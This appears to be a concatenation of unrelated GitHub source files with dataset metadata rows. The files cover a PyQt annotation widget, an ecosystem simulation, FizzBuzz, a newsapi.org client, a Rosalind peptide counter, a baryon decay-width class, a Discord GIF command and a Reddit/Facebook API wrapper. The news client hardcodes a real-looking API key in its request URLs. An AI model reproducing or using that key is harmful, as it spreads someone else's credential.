        '''
        Mouse released: stop all dragging and drop degenerate boxes
        (zero width or zero height).
        '''
        print ("ReleaseMouse")
        self.mode = [" " for _ in range(len(self.mode))]
        # BUG FIX: the original removed items from self.selections while
        # iterating over it (skipping elements) and never trimmed the
        # parallel lists, desynchronising them.  Rebuild every list from
        # the surviving indices instead.
        keep = []
        for i, sel in enumerate(self.selections):
            if (self.upper_left[i].x() == self.lower_right[i].x()
                    or self.upper_left[i].y() == self.lower_right[i].y()):
                print ('remove')
                sel.hide()
            else:
                keep.append(i)
        self.selections = [self.selections[i] for i in keep]
        self.upper_left = [self.upper_left[i] for i in keep]
        self.lower_right = [self.lower_right[i] for i in keep]
        self.mode = [self.mode[i] for i in keep]
        self.category = [self.category[i] for i in keep]
        self.id = [self.id[i] for i in keep]
        self.active_bboxes = len(self.selections)

    def paintEvent(self, event):
        """Paint the label, then a translucent colour fill per box."""
        super(RubberbandEnhancedLabelMultiple, self).paintEvent(event)
        qp = QtGui.QPainter()
        qp.begin(self)
        qp.setOpacity(0.1)
        d = {0: QtGui.QColor('red'), 1: QtGui.QColor('blue'), 2: QtGui.QColor('green'), 3: QtGui.QColor('black')}
        for i in range(len(self.selections)):
            brush = QtGui.QBrush(QtCore.Qt.SolidPattern)
            brush.setColor(d[self.category[i]])
            qp.setBrush(brush)
            qp.drawRect(self.upper_left[i].x(), self.upper_left[i].y(), self.selections[i].width(),
                        self.selections[i].height())
        # BUG FIX: do NOT call self.update() from inside paintEvent --
        # scheduling a repaint from the paint handler makes the widget
        # repaint in a busy loop.  The mouse handlers call update() when
        # the geometry actually changes.
        qp.end()

    def reset_selected(self):
        """Hide and forget every box, clearing all parallel lists."""
        for sel in self.selections:
            sel.hide()
        self.selections = []
        self.active_bboxes = 0
        self.upper_left = []
        self.lower_right = []
        self.mode = []
        # BUG FIX: the original left category/id populated, so boxes drawn
        # after a reset were painted with stale categories.
        self.category = []
        self.id = []

    def keyPressEvent(self, event):
        """Backspace hides the most recently drawn box."""
        print ("key")
        if event.key() == (QtCore.Qt.Key_Backspace) and self.active_bboxes > 0:
            print ('ctrl z')
            # BUG FIX: active_bboxes is a count, so the last valid index is
            # active_bboxes - 1 (the original indexed one past the end and
            # raised IndexError).
            self.selections[self.active_bboxes - 1].hide()
            self.active_bboxes -= 1
#
# def resizeEvent(self, event):
# self.setPixmap(self._pixmap.scaled(
# self.width(), self.height(),
# QtCore.Qt.KeepAspectRatio))
# app = QtGui.QApplication([])
#
# screen_pixmap = QtGui.QPixmap('data/1.jpg')#.grabWindow(app.desktop().winId())
#
# window = QtGui.QWidget()
# layout = QtGui.QVBoxLayout(window)
# label = RubberbandEnhancedLabel()
# label.setPixmap(screen_pixmap)
# layout.addWidget(label)
# geometry = app.desktop().availableGeometry()
# window.setFixedSize(500, 500)
# window.show()
# app.exec_() | lkosh/abandoned_objects | select2.py | select2.py | py | 10,387 | python | en | code | 1 | github-code | 36 |
23331748159 | import matplotlib.pyplot as plt
from utility_functions import *
# --- Simulation configuration (names/units per the project's utility_functions;
# spectral_method, water_column, ecosystem_* etc. come from that star import) ---
depth = 120          # water-column depth
layers = 100         # number of vertical layers per segment
segments = 1
size_classes = 2
lam = 300            # resource replacement rate passed to water_column
simulate = False
verbose = True
l2 = False
min_attack_rate = 10**(-3)
# Masses of the three trophic levels -- TODO confirm units (the commented
# alternative suggests these are interchangeable test values).
mass_vector = np.array([0.05, 20, 6000]) # np.array([1, 30, 300, 400, 800, 16000])
obj = spectral_method(depth, layers, segments=segments)
# Candidate initial resource profiles over the spectral grid obj.x.
logn = stats.lognorm.pdf(obj.x, 1, 0)
norm_dist = stats.norm.pdf(obj.x, loc=0, scale=3)
res_start = 8*norm_dist # 0.1*(1-obj.x/depth)
res_max = 10 * norm_dist
# Logistic resource dynamics, no advection/diffusion.
water_start = water_column(obj, res_start, layers=layers * segments, resource_max=res_max, replacement=lam, advection=0,
                           diffusion=0, logistic = True)
params = ecosystem_parameters(mass_vector, obj, lam=0.3, min_attack_rate = min_attack_rate, forage_mass = 0.05/408)
params.handling_times = np.zeros(3)   # linear (type-I) functional response
eco = ecosystem_optimization(mass_vector, layers * segments, params, obj, water_start, l2=l2, movement_cost=0)
eco.population_setter(np.array([1, 0.1, 0.01]))
eco.heat_kernel_creator(10**(-1))
# Share one smoothing kernel across all three size classes.
eco.heat_kernels[1] = eco.heat_kernels[0]
eco.heat_kernels[2] = eco.heat_kernels[0]
eco.parameters.who_eats_who[1,0] = 1   # predator 1 feeds on prey 0
# Solve the habitat-choice problem with both optimizers for comparison.
opt_sol_quad_opt = quadratic_optimizer(eco)
opt_sol = lemke_optimizer(eco)
#
# Smoothed depth distributions of the three size classes (Lemke solution).
plt.plot(obj.x, opt_sol[0:layers]@eco.heat_kernels[0])
plt.plot(obj.x, opt_sol[layers:2*layers]@eco.heat_kernels[0])
plt.plot(obj.x, opt_sol[2*layers:3*layers]@eco.heat_kernels[0])
plt.show()
# Same, for the quadratic-optimizer solution.
plt.plot(obj.x, opt_sol_quad_opt[0:layers]@eco.heat_kernels[0])
plt.plot(obj.x, opt_sol_quad_opt[layers:2*layers]@eco.heat_kernels[0])
plt.plot(obj.x, opt_sol_quad_opt[2*layers:3*layers]@eco.heat_kernels[0])
plt.show()
simulator(eco, params, "proper_tritrophic", total_days=180, lemke = True)
# 3 more decision problems
# FizzBuzz values
# use % to find multiples of a number (remainder equal to zero)
number = int(input('Enter a positive integer: '))
# BUG FIX: test the combined case first -- when "% 3" is checked first, a
# multiple of both 3 and 5 (e.g. 15) prints 'Fizz' and the 'FizzBuzz'
# branch is unreachable.
if number % 3 == 0 and number % 5 == 0:
    print('FizzBuzz')
elif number % 3 == 0:
    print('Fizz')
elif number % 5 == 0:
    print('Buzz')
else:
    print(number)
# Another way to do this question: build the answer incrementally.
# The 3-and-5 case works naturally here because both suffixes append.
number_str = ''
if number % 3 == 0:
    number_str += 'Fizz'
if number % 5 == 0:
    number_str += 'Buzz'
if number_str == '':
    number_str += str(number)
print(number_str)  # the original computed this but never printed it
| JordanRabold/Python-3.10 | fizz_buzz.py | fizz_buzz.py | py | 588 | python | en | code | 0 | github-code | 36 |
16010531173 | '''
api_test.py
Jeff Ondich, 11 April 2016
Ethan Somes, 13 April, 2017
Revised from Jeff's example for CS 257 Software Design. How to retrieve results
from an HTTP-based API, parse the results (JSON in this case),
and manage the potential errors.
'''
import sys
import argparse
import json
import urllib.request
import re
def get_headlines(source, sorting):
    '''
    Fetch the articles of one news source and return them as a list of
    dictionaries of the form {'title': title, 'author': author}, sorted
    according to *sorting* ("top", "latest" or "popular").

    The *source* parameter must be one of the 70 source codes listed at
    https://newsapi.org/sources

    Raises an exception on network errors and when an article's title or
    author is not a string.
    '''
    # Assemble the request URL for the newsapi.org v1 articles endpoint.
    url = ''.join(['https://newsapi.org/v1/articles?source=',
                   source,
                   '&sortby=', sorting,
                   '&apiKey=82cf4993bd7b404abae9673a74e61d01'])
    raw_bytes = urllib.request.urlopen(url).read()
    payload = json.loads(raw_bytes.decode('utf-8'))

    headlines = []
    for entry in payload['articles']:
        title = entry['title']
        author = entry['author']
        # Validate the payload shape before accepting the entry.
        if type(author) != type(''):
            raise Exception('author has wrong type: "{0}"'.format(author))
        if type(title) != type(''):
            raise Exception('title has wrong type: "{0}"'.format(title))
        headlines.append({'title': title, 'author': author})
    return headlines
def get_Description(source, title):
    '''
    Return {'title': title, 'description': description} for the article in
    *source* whose title matches *title*.  Titles are compared with all
    non-alphanumeric characters stripped, so minor punctuation/whitespace
    differences do not prevent a match.  The description is '' when no
    article matches.

    The *source* parameter must be one of the source codes listed at
    https://newsapi.org/sources

    Raises exceptions on network connection errors and on data
    format errors.
    '''
    base_url = 'https://newsapi.org/v1/articles?source='
    apiKey = '&apiKey=82cf4993bd7b404abae9673a74e61d01'
    url = base_url + source + apiKey
    data_from_server = urllib.request.urlopen(url).read()
    string_from_server = data_from_server.decode('utf-8')
    loaded = json.loads(string_from_server)
    article_list = loaded['articles']
    # Normalise the requested title once instead of on every iteration.
    titleEntry = re.sub("[^a-z0-9]+", "", title, flags=re.IGNORECASE)
    description = ""
    for article_dictionary in article_list:
        dictEntry = re.sub("[^a-z0-9]+", "", article_dictionary['title'], flags=re.IGNORECASE)
        if dictEntry == titleEntry:
            description = article_dictionary['description']
    if type(description) != type(''):
        # A missing/None description from the API is a data-format error.
        # BUG FIX: the original message referenced an undefined name `text`,
        # so this branch raised NameError instead of the intended diagnostic.
        raise Exception('description has wrong type: "{0}"'.format(description))
    return {'title': title, 'description': description}
def main():
    """Interactive driver: ask the user for a mode and a news source, then
    show either one article's description or a list of headlines."""
    intro = ("This program allows you to look at news headlines from many sources!",
             "The 70 news sources available and thier codes are listed here: https://newsapi.org/sources",
             "You can either search for the description of a particular article from a source,",
             "or you can search for a list of headlines from a source.")
    for line in intro:
        print(line)
    mode = input("Would you like a description or a list of headlines? Enter description or list. ")
    source_code = input("Enter a news source code: ")
    if mode == "description":
        wanted_title = input("What is the title of the article you want to look at?")
        info = get_Description(source_code, wanted_title)
        print("Title: " + wanted_title)
        print(info['description'])
    elif mode == "list":
        sort_order = input("How would you like the list to be sorted? Enter top, latest, or popular. ")
        for item in get_headlines(source_code, sort_order):
            print(item['title'] + ": " + item['author'])


if __name__ == '__main__':
    main()
# When I use argparse to parse my command line, I usually
# put the argparse setup here in the global code, and then
# call a function called main to do the actual work of
# the program.
''' parser = argparse.ArgumentParser(description='Get word info from the Ultralingua API')
parser.add_argument('action',
metavar='action',
help='action to perform ("description" or "list")',
choices=['description', 'list'])
parser.add_argument('source',
metavar='source',
help='The source parameter must one of the 70 souces formatted as seen on https://newsapi.org/sources',
parser.add_argument('sorting', help='the word you want to act on')
parser.add_argument('word', help='the word you want to act on')
args = parser.parse_args()
main(args)''' | NylaWorker/TrebuchetPhysicsSimulation | CS257/API.py | API.py | py | 5,087 | python | en | code | 0 | github-code | 36 |
27254946312 | """
---------------------------------------------------------------
Authors: A. Ramirez-Morales (andres.ramirez.morales@cern.ch)
H. Garcia-Tecocoatzi
---------------------------------------------------------------
"""
from decays.decay_wrapper import decay
import decays.decay_utils_em as du
import numpy as np
class ElectroWidths:
    """
    Class that administrates the decay width calculations of the heavy baryon widths done by the C++ class
    The class calls the python wrapper and feeds the functions with the needed quantum numbers
    and masses
    baryon FLAG: 1 -> omega, 2->cascade_6, 3->sigma,# 4 -> lambda, 5-> cascade_3
    ModEx FLAG: 0 -> ground(grd), 1 -> lambda(lam), 2->rho
    decPr FLAG: 0 -> ... decayProduct Flag
    """
    def __init__(self, bootstrap=False, baryons='', workpath="."):
        # NOTE(review): `baryons` is accepted but never used in the
        # constructor -- confirm whether it can be removed.
        self.m_width = decay(workpath)       # C++ wrapper that evaluates individual widths
        self.fetch_decay_masses(bootstrap)   # load decay-product masses (and Gaussians when bootstrapping)
        self.channel_widths_vector = []      # per call: array of individual channel widths

    def total_decay_width(self, baryons, k_prim, massA, SA_val, JA_val, LA_val, SlA_val,
                          ModEx_val, bootstrap=False, m1=0, m2=0, m3=0):
        """
        Method that calls the wrapper and sums the individual decay widths

        baryons:  family name ('omegas', 'cascades', 'sigmas', 'lambdas', 'cascades_anti3')
        k_prim:   spring-constant-like parameter used to build the h.o. alphas
        massA:    decaying-baryon mass in MeV; SA/JA/LA/SlA are its spin/angular quantum numbers
        ModEx_val: excitation mode label ('grd'/'lam'/'rho')
        m1, m2, m3: bottom, strange and light quark masses in MeV
        Returns the total electromagnetic width (sum over all channels).
        """
        mb = m1
        ms = m2
        ml = m3
        # ml = 299.0
        # ms = 465.0
        # mb = 4928.0
        # k_prim = 5044.799302252
        # massA = 5.935 * 1000
        # Convert MeV -> GeV for the wrapper call.
        MassA = massA/1000.0
        mbottom = mb/1000.0
        mupdown = ml/1000.0
        mstrange = ms/1000.0
        SA_qm = SA_val
        JA_qm = JA_val
        LA_qm = LA_val
        SlA_qm = SlA_val
        # Split the total orbital momentum into lambda/rho projections.
        LlA_qm, LrA_qm = self.orbital_projections(ModEx_val, LA_val)
        baryon = self.baryon_flag(baryons)
        ModEx = self.ModEx_flag(ModEx_val)
        nChannels = self.n_channels(baryons)
        # Reduced masses are computed in MeV, hence the *1000 factors.
        m_lam, m_rho = self.reduced_masses(baryons, mbottom*1000, mupdown*1000, mstrange*1000)
        channel_widths = ([])
        alpha_lam = self.alphas(k_prim, m_lam)
        alpha_rho = self.alphas(k_prim, m_rho)
        # Loop over every open decay channel for this baryon family.
        for i in range(nChannels):
            decPr = i+1
            MassB = self.decay_mass(bootstrap, baryons, decPr)
            single_decay_value = self.m_width.electro_width(MassA, SA_qm, JA_qm, LA_qm, SlA_qm, LlA_qm, LrA_qm,
                                                            MassB,
                                                            alpha_lam, alpha_rho,
                                                            mbottom, mupdown, mstrange,
                                                            baryon, ModEx, decPr)
            channel_widths = np.append(channel_widths, single_decay_value)
            baryon_name, ModEx_name, decPr_name = du.state_labels(baryon, ModEx, decPr, LA_qm)
            if not bootstrap:
                print('%6s | %10s | %12s | %5.3f | %5.3f | %5.1f | %5.1f | %5.1f | %5.1f | %5.6f '
                      %(baryon_name, ModEx_name, decPr_name, MassA, MassB, JA_qm, LA_qm, SA_qm, SlA_qm, single_decay_value))
        # sum the individual width to obtain total width
        total_decay_width = np.sum(channel_widths)
        # print(alpha_lam,alpha_rho)
        if not bootstrap:
            print(' ****************** TOTAL ELECTROMAGNETIC WIDTH FOR', baryons, ModEx_name, round(total_decay_width,4), ' ******************')
            print('-------------------------------------------------------------------------------------------------------------')
        self.channel_widths_vector.append(channel_widths) # for individual decay tables, this is a list of arrays!
        return total_decay_width

    def orbital_projections(self, ModEx_val, LA_val):
        """
        Method to fetch the orbital projections (up to P-wave).
        Returns (LlA, LrA); (-1, -1) flags an unknown excitation mode.
        """
        if(ModEx_val=="grd"):
            LlA = LA_val
            LrA = LA_val
        elif(ModEx_val=="lam"):
            # lambda excitation: all orbital momentum in the lambda coordinate
            LlA = LA_val
            LrA = 0
        elif(ModEx_val=="rho"):
            # rho excitation: all orbital momentum in the rho coordinate
            LlA = 0
            LrA = LA_val
        else:
            LlA = -1
            LrA = -1
        return LlA, LrA

    def baryon_flag(self, baryons):
        """
        Method to parse the baryon names to integers.
        Returns None (implicitly) for an unrecognised name.
        """
        if(baryons=='omegas'): return 1
        elif(baryons=='cascades'): return 2
        elif(baryons=='sigmas'): return 3
        elif(baryons=='lambdas'): return 4
        elif(baryons=='cascades_anti3'): return 5

    def reduced_masses(self, baryons, mb_input, ml_input, ms_input):
        """
        Method to calculate reduced masses of the harmonic oscillator.
        Inputs are in MeV; returns (m_lam, m_rho) in MeV.
        """
        m_lam, m_rho=0,0
        if(baryons=='omegas'):
            m_rho = ms_input
            m_lam = (3*ms_input*mb_input)/(2*ms_input+mb_input)
        elif(baryons=='cascades' or baryons =='cascades_anti3'):
            m_rho = (ml_input+ms_input)/2
            m_lam = (1.5*(ml_input+ms_input)*mb_input)/(mb_input+ml_input+ms_input)
        elif(baryons=='sigmas' or baryons=='lambdas'):
            m_rho = ml_input
            m_lam = (3*ml_input*mb_input)/(2*ml_input+mb_input)
        return m_lam, m_rho

    def alphas(self, k_prim, m_lam_rho):
        """
        Method to calculate the decay alphas.
        k_prim and m_lam_rho are in MeV; the result is returned in GeV.
        """
        value1 = (np.sqrt(3./m_lam_rho)) * k_prim
        value2 = value1*m_lam_rho
        return np.sqrt(value2)/1000. # transform from MeV -> GeV

    def ModEx_flag(self, ModEx_val):
        """
        Method to parse the h.o mode to integers
        grd=0, lam =1 , rho=2
        """
        if(ModEx_val=='grd'): return 0
        elif(ModEx_val=='lam'): return 1
        elif(ModEx_val=='rho'): return 2

    def n_channels(self, baryons):
        """
        Method to set the number of decay channels each baryon has.
        Must stay consistent with the decPr cases handled in decay_mass.
        """
        if(baryons=='omegas'): return 2
        elif(baryons=='cascades'): return 6
        elif(baryons=='sigmas'): return 7
        elif(baryons=='lambdas'): return 3
        elif(baryons=='cascades_anti3'): return 6

    def decay_mass(self, bootstrap, baryons, decPr):
        """
        Method to fetch the mass of the decay products (in GeV).
        With bootstrap=True a mass is sampled from the corresponding
        Gaussian built in fetch_decay_masses; otherwise the central
        value is returned.
        """
        if(baryons=='omegas'):
            if(decPr==1):
                if not bootstrap: return self.omega_mass
                else: return np.random.choice(self.gauss_omega, size=None)
            if(decPr==2):
                if not bootstrap: return self.omega_s_mass
                else: return np.random.choice(self.gauss_omega_s, size=None)
        elif(baryons=='cascades' or baryons=='cascades_anti3'):
            if(decPr==1):
                if not bootstrap: return self.xi_mass
                else: return np.random.choice(self.gauss_xi, size=None)
            elif(decPr==2):
                if not bootstrap: return self.xi_mass
                else: return np.random.choice(self.gauss_xi, size=None)
            elif(decPr==3):
                if not bootstrap: return self.xi_p_mass
                else: return np.random.choice(self.gauss_xi_p, size=None)
            elif(decPr==4):
                if not bootstrap: return self.xi_p_mass
                else: return np.random.choice(self.gauss_xi_p, size=None)
            elif(decPr==5):
                if not bootstrap: return self.xi_p_s_mass
                else: return np.random.choice(self.gauss_xi_p_s, size=None)
            elif(decPr==6):
                if not bootstrap: return self.xi_p_s_mass
                else: return np.random.choice(self.gauss_xi_p_s, size=None)
        elif(baryons=='sigmas'):
            if(decPr==1):
                if not bootstrap: return self.sigma_mass
                else: return np.random.choice(self.gauss_sigma, size=None)
            elif(decPr==2):
                if not bootstrap: return self.sigma_mass
                else: return np.random.choice(self.gauss_sigma, size=None)
            elif(decPr==3):
                if not bootstrap: return self.sigma_mass
                else: return np.random.choice(self.gauss_sigma, size=None)
            elif(decPr==4):
                if not bootstrap: return self.lambda_mass
                else: return np.random.choice(self.gauss_lambda, size=None)
            elif(decPr==5):
                if not bootstrap: return self.sigma_s_mass
                else: return np.random.choice(self.gauss_sigma_s, size=None)
            elif(decPr==6):
                if not bootstrap: return self.sigma_s_mass
                else: return np.random.choice(self.gauss_sigma_s, size=None)
            elif(decPr==7):
                if not bootstrap: return self.sigma_s_mass
                else: return np.random.choice(self.gauss_sigma_s, size=None)
        elif(baryons=='lambdas'):
            if(decPr==1):
                if not bootstrap: return self.lambda_mass
                else: return np.random.choice(self.gauss_lambda, size=None)
            elif(decPr==2):
                if not bootstrap: return self.sigma_mass
                else: return np.random.choice(self.gauss_sigma, size=None)
            elif(decPr==3):
                if not bootstrap: return self.sigma_s_mass
                else: return np.random.choice(self.gauss_sigma_s, size=None)

    def fetch_decay_masses(self, bootstrap):
        '''
        Method to fetch the decay products coming from our fit (mA).
        Central values are in GeV; when bootstrap=True, 10000-sample
        Gaussians (mean, sigma) are also built for each product so that
        decay_mass can sample them.
        '''
        self.omega_mass   = 6.06400
        self.omega_s_mass = 6.09300
        self.sigma_mass   = 5.80500
        self.sigma_s_mass = 5.83400
        self.xi_p_mass    = 5.92500
        self.xi_p_s_mass  = 5.95500
        self.xi_mass      = 5.80600
        self.lambda_mass  = 5.61400
        if(bootstrap):
            self.gauss_omega   = np.random.normal(6.06400, 0.00600, 10000)
            self.gauss_omega_s = np.random.normal(6.09300, 0.00700, 10000)
            self.gauss_sigma   = np.random.normal(5.80500, 0.00600, 10000)
            self.gauss_sigma_s = np.random.normal(5.83400, 0.00700, 10000)
            self.gauss_xi_p    = np.random.normal(5.92500, 0.00500, 10000)
            self.gauss_xi_p_s  = np.random.normal(5.95500, 0.00500, 10000)
            self.gauss_xi      = np.random.normal(5.80600, 0.00700, 10000)
            self.gauss_lambda  = np.random.normal(5.61400, 0.00700, 10000)
| Ailierrivero/bottom-baryonsFW-copy | decays/electro_width.py | electro_width.py | py | 10,332 | python | en | code | 0 | github-code | 36 |
11831438569 | import discord
from discord.ext import commands
from discord.commands import Option
from commands.funcs.yatta_gif import yatta_gif
# List of commands here:
# /yattagif
class Gif(commands.Cog, description='Gif maker'):
    # Cog bundling GIF-creation slash commands (currently just /yattagif).
    def __init__(self, bot):
        self.bot = bot
        # Footer text appended to every embed this cog sends.
        self.footer = "Developed by jej#6495 for Snowcodes 2022 ❄️"

    @commands.slash_command()
    async def yattagif(
        self,
        ctx: discord.ApplicationContext,
        member: Option(discord.Member, "member", required=False)):
        """Get Yatta'd"""
        # Default to the command invoker when no member is supplied.
        if member is None:
            member = ctx.author
        url = str(member.display_avatar)
        # Renders the gif to assets/images/yatta/result.gif as a side effect.
        yatta_gif(url)
        # Respond immediately; gif generation may exceed the interaction window.
        await ctx.respond("Loading....")
        embed = discord.Embed (
            title = 'I will reverse all creations!',
            description = "",
            colour = discord.Colour.from_rgb(247, 168, 178)
        )
        file = discord.File("assets/images/yatta/result.gif", filename="result.gif")
        # Reference the attachment by filename so Discord inlines it in the embed.
        embed.set_image(url="attachment://result.gif")
        embed.set_footer(text=self.footer)
        await ctx.edit(content=None, file=file, embed=embed)
def setup(bot):
    # Extension entry point: called by bot.load_extension() to register the cog.
    bot.add_cog(Gif(bot))
| jej-v/snowcodes2022 | commands/yatta.py | yatta.py | py | 1,201 | python | en | code | 0 | github-code | 36 |
def jugar_suma_modular(modulo, numero_inicial, numero_objetivo):
    """Interactive modular-sum game.

    Starting from ``numero_inicial``, repeatedly read an integer from the
    user and add it to the running total modulo ``modulo``, echoing the
    partial result, until the total equals ``numero_objetivo``.
    """
    acumulado = numero_inicial
    while True:
        # Win as soon as the running total hits the target.
        if acumulado == numero_objetivo:
            break
        entrada = int(input("Ingresa un número para sumar: "))
        acumulado = (acumulado + entrada) % modulo
        print(f"Resultado parcial: {acumulado}")
    print("¡Ganaste!")
# Game configuration: work modulo 7, start at 2, win when the total hits 5.
modulo_juego = 7
numero_inicial_juego = 2
numero_objetivo_juego = 5
jugar_suma_modular(modulo_juego, numero_inicial_juego, numero_objetivo_juego)
# Memo table: maps (remaining_mass, masses) -> number of sequences.  A dict
# gives O(1) lookups; the original kept two parallel lists and performed a
# linear list.index() search per cache hit.
memo = {}

def Count(end, totalmass, masses=None):
    """Count the ordered sequences (compositions) of values drawn, with
    repetition, from *masses* that begin with *end* and sum to *totalmass*.

    :param end:       mass of the first element of the sequence
    :param totalmass: total mass the sequence must reach (including *end*)
    :param masses:    iterable of allowed masses; defaults to the
                      module-level ``masslist`` loaded from the mass table
    :return: number of such sequences

    BUG FIX: the original returned 1 whenever ``totalmass == 0`` *before*
    subtracting ``end``, so each finished sequence was reached once per
    entry of masslist at the terminal recursion level -- an overcount by a
    constant factor of ``len(masslist)``.  The base case now tests whether
    ``end`` exactly consumes the remaining mass.
    """
    if masses is None:
        masses = masslist
    masses = tuple(masses)  # hashable, so it can be part of the memo key
    remaining = totalmass - end
    if remaining < 0:
        return 0
    if remaining == 0:
        # `end` exactly uses up the mass: exactly one sequence ends here.
        return 1
    key = (remaining, masses)
    if key in memo:
        return memo[key]
    value = 0
    for nxt in masses:
        value += Count(nxt, remaining, masses)
    memo[key] = value
    return value
# Load the amino-acid integer masses (second column of each row) from the
# Rosalind-style mass table, then deduplicate while preserving order.
masslist=[]
with open("integer_mass_table.txt","r") as f:
    for line in f:
        content=line.split()
        masslist.append(int(content[1]))
masslist=list(dict.fromkeys(masslist))
print(masslist)
totalmass=1024
# Total = sum over every possible first mass of the sequences it starts.
answer=0
for i in range(len(masslist)):
    answer+=Count(masslist[i],totalmass)
print(answer)
| XueningHe/Rosalind_Genome_Sequencing | PeptideNumberGivenMass.py | PeptideNumberGivenMass.py | py | 752 | python | en | code | 0 | github-code | 36 |
18852099221 | from os import environ
from time import time, sleep
import requests
import requests.auth
from requests_oauthlib import OAuth1
from .exceptions import *
class API:
    """Common plumbing for the concrete API clients below: error logging,
    retry-with-backoff GET requests and query-parameter merging."""

    def __init__(self, session=None):
        self.log_function = print
        self.retry_rate = 5          # seconds; multiplied by the attempt number
        self.num_retries = 5
        self.failed_last = False     # True after one unrecovered request failure
        self.force_stop = False      # set externally to cut _sleep short
        self.ignore_errors = False
        self.common_errors = (requests.exceptions.ConnectionError,
                              requests.exceptions.Timeout,
                              requests.exceptions.HTTPError)
        self.session = session       # optional requests.Session for pooling/auth

    def __str__(self):
        # BUG FIX: pformat was referenced without ever being imported, so
        # str(instance) raised NameError.  Import it locally here.
        from pprint import pformat
        return pformat(vars(self))

    def log_error(self, e):
        """
        Print errors. Stop travis-ci from leaking api keys

        :param e: The error
        :return: None
        """
        if not environ.get('CI'):
            self.log_function(e)
            if hasattr(e, 'response') and hasattr(e.response, 'text'):
                self.log_function(e.response.text)

    def _sleep(self, seconds):
        """
        Sleep between requests, but don't force asynchronous code to wait

        :param seconds: The number of seconds to sleep
        :return: None
        """
        # Sleep in 1 s slices so force_stop can interrupt promptly.
        for _ in range(int(seconds)):
            if not self.force_stop:
                sleep(1)

    @staticmethod
    def merge_params(parameters, new):
        # Values in `new` override duplicate keys in `parameters`;
        # the input dictionaries are not mutated.
        if new:
            parameters = {**parameters, **new}
        return parameters

    def get(self, *args, **kwargs):
        """
        An interface for get requests that handles errors more gracefully to
        prevent data loss
        """
        # Honour the shared session when present.  BUG FIX: the retry path
        # below previously fell back to plain requests.get even when a
        # session (with its auth/cookies) had been supplied.
        req_func = self.session.get if self.session else requests.get
        try:
            req = req_func(*args, **kwargs)
            req.raise_for_status()
            self.failed_last = False
            return req

        except requests.exceptions.RequestException as e:
            self.log_error(e)
            for i in range(1, self.num_retries):
                sleep_time = self.retry_rate * i   # linear backoff
                self.log_function("Retrying in %s seconds" % sleep_time)
                self._sleep(sleep_time)
                try:
                    req = req_func(*args, **kwargs)
                    req.raise_for_status()
                    self.log_function("New request successful")
                    return req
                except requests.exceptions.RequestException:
                    self.log_function("New request failed")

            # Allows for the api to ignore one potentially bad request
            if not self.failed_last:
                self.failed_last = True
                raise ApiError(e)
            else:
                raise FatalApiError(e)
class Reddit(API):
    """Minimal Reddit client using OAuth2 client-credentials tokens."""

    def __init__(self, application_id, application_secret):
        super().__init__()
        self.retry_rate /= 2  # Because it will try reauthorise if failure
        self.application_id = application_id
        self.application_secret = application_secret
        self.url = "https://oauth.reddit.com"
        self.request_rate = 5          # minimum seconds between API calls
        self.user_agent = "SocialReaper"
        self.headers = {}              # filled by auth()
        self.token_expiry = 0          # epoch seconds when the token lapses
        self.requires_reauth = True
        self.auth()
        self.last_request = time()

    def auth(self):
        """Obtain a client-credentials bearer token and cache the headers."""
        client_auth = requests.auth.HTTPBasicAuth('%s' % self.application_id,
                                                  '%s' % self.application_secret)
        post_data = {"grant_type": "client_credentials"}
        headers = {"User-Agent": self.user_agent}

        try:
            response = requests.post(
                "https://www.reddit.com/api/v1/access_token",
                auth=client_auth, data=post_data,
                headers=headers)
        except requests.exceptions.RequestException as e:
            raise ApiError(e)

        # NOTE(review): response status is not checked here; a failed auth
        # yields headers with "bearer None" -- confirm whether
        # raise_for_status() should be added.
        rj = response.json()
        self.headers = {"Authorization": "bearer %s" % rj.get('access_token'),
                        "User-Agent": self.user_agent}
        self.token_expiry = time() + rj.get('expires_in', 0)

    def api_call(self, edge, parameters, return_results=True):
        """GET `edge` with `parameters`, throttling and re-authing as needed."""
        # NOTE(review): this re-auths only 30 s *after* expiry; a margin
        # before expiry (token_expiry - 30) may be what was intended.
        if time() > self.token_expiry + 30:
            self.auth()

        # Throttle to at most one request per request_rate seconds.
        time_diff = time() - self.last_request
        if time_diff < self.request_rate:
            sleep(self.request_rate - time_diff)
        self.last_request = time()

        try:
            req = self.get("%s/%s" % (self.url, edge), params=parameters,
                           headers=self.headers)
        except (ApiError, FatalApiError):
            # One retry after a best-effort re-auth.
            try:
                self.auth()
            except ApiError:
                pass
            req = self.get("%s/%s" % (self.url, edge), params=parameters,
                           headers=self.headers)

        if return_results:
            return req.json()

    def search(self, query, count=100, order="new", page='',
               result_type="link", time_period="all", **params):
        """Site-wide search; `page` is Reddit's `after` pagination cursor."""
        parameters = {"show": "all",
                      "q": query,
                      "limit": count,
                      "sort": order,
                      "type": result_type,
                      "t": time_period,
                      "after": page}

        parameters = self.merge_params(parameters, params)
        return self.api_call('search.json', parameters)

    def subreddit(self, subreddit, count=100, category="new", page='',
                  time_period='all', **params):
        """Listing for one subreddit; `category` picks the listing endpoint."""
        parameters = {"limit": count,
                      "t": time_period,
                      "after": page}

        parameters = self.merge_params(parameters, params)
        return self.api_call('r/%s/%s.json' % (subreddit, category), parameters)

    def user(self, user, count=100, order="new", page='',
             result_type="overview", time_period='all', **params):
        """A user's history; `result_type` selects overview/comments/etc."""
        parameters = {"show": "all",
                      "limit": count,
                      "sort": order,
                      "type": result_type,
                      "t": time_period,
                      "after": page}

        parameters = self.merge_params(parameters, params)
        return self.api_call('user/%s/%s.json' % (user, result_type),
                             parameters)

    def thread_comments(self, thread, subreddit, order="top", sub_thread=None,
                        **params):
        """Comments of a thread; `sub_thread` focuses one comment subtree."""
        parameters = {"depth": 50,
                      "showmore": True,
                      "sort": order}

        parameters = self.merge_params(parameters, params)

        path = None
        if sub_thread:
            path = 'r/%s/comments/%s/_/%s.json' % (
                subreddit, thread, sub_thread)
        else:
            path = 'r/%s/comments/%s.json' % (subreddit, thread)

        return self.api_call(path, parameters)

    def more_children(self, children, link_id, sort="new",
                      **params):
        """Expand collapsed comment ids (the 'load more comments' endpoint)."""
        parameters = {"api_type": "json",
                      "children": ",".join(children),
                      "link_id": link_id,
                      "sort": sort,
                      "limit_children": False
                      }

        parameters = self.merge_params(parameters, params)
        return self.api_call('api/morechildren', parameters)
class Facebook(API):
    """Minimal Facebook Graph API client (access-token auth)."""

    def __init__(self, api_key):
        super().__init__()
        self.key = api_key
        self.url = "https://graph.facebook.com/v"
        self.version = "2.9"
        self.request_rate = 1     # minimum seconds between calls
        self.last_request = time()

    def api_call(self, edge, parameters, return_results=True):
        """GET a Graph API edge, then throttle before the next call."""
        req = self.get("%s%s/%s" % (self.url, self.version, edge),
                       params=parameters)

